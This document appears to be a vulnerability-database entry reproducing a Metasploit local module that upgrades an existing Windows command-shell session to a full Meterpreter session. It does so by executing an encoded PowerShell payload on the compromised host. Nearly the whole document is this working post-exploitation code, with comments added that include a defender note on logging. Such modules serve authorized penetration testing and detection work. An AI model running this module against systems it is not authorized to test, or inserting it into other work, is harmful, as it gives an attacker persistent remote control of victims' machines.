Windows Command Shell Upgrade (Powershell)

2014-02-02T19:04:38
ID MSF:EXPLOIT/WINDOWS/LOCAL/POWERSHELL_CMD_UPGRADE
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module executes PowerShell on a host where a Windows command shell session already exists, upgrading that session to a full Meterpreter session.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

# Local (post-session) module: it needs an existing Windows command shell
# session and uses PowerShell on the target to start a Meterpreter payload.
# It does not exploit a vulnerability; it relies only on powershell.exe being
# present on the host.
#
# Defender note: the activity is a powershell.exe process launched from the
# command line of an existing shell session. Process-creation logging with
# command lines and PowerShell script block logging are the usual places to
# look for it; the exact command-line shape depends on cmd_psh_payload, which
# is defined outside this file.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::File

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged with the
  #   values declared here via update_info
  def initialize(info = {})
    module_info = {
      'Name'          => 'Windows Command Shell Upgrade (Powershell)',
      'Description'   => %q{
          This module executes Powershell to upgrade a Windows Shell session
          to a full Meterpreter session.
        },
      'License'       => MSF_LICENSE,
      'Author'        => ['Ben Campbell'],
      # WfsDelay: extra seconds to wait for the new session to arrive.
      'DefaultOptions' => { 'WfsDelay' => 10 },
      # NOTE(review): looks like a placeholder date, since no vulnerability
      # is being disclosed here - confirm.
      'DisclosureDate' => 'Jan 01 1999',
      'Platform'      => ['win'],
      # Only plain command shell sessions are accepted as input.
      'SessionTypes'  => ['shell'],
      'Targets'       => [['Universal', {}]],
      'DefaultTarget' => 0
    }

    super(update_info(info, module_info))
  end

  # Checks that powershell.exe exists under %WINDIR%\System32 and, if so,
  # runs the PowerShell command line built from the encoded payload in the
  # existing session. Fails with Failure::NotVulnerable when the binary is
  # not found.
  def exploit
    powershell_relative = "\\WindowsPowerShell\\v1.0\\powershell.exe"
    powershell_exe = "%WINDIR%\\System32#{powershell_relative}"

    # Only this one fixed location is checked; hosts without PowerShell at
    # that path are reported as not affected.
    return fail_with(Failure::NotVulnerable, "No powershell available.") unless file?(powershell_exe)

    print_status("Executing powershell command line...")
    # cmd_psh_payload comes from the Exploit::Powershell mixin; it is given
    # the encoded payload and the first architecture of the payload instance.
    cmd_exec(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
  end
end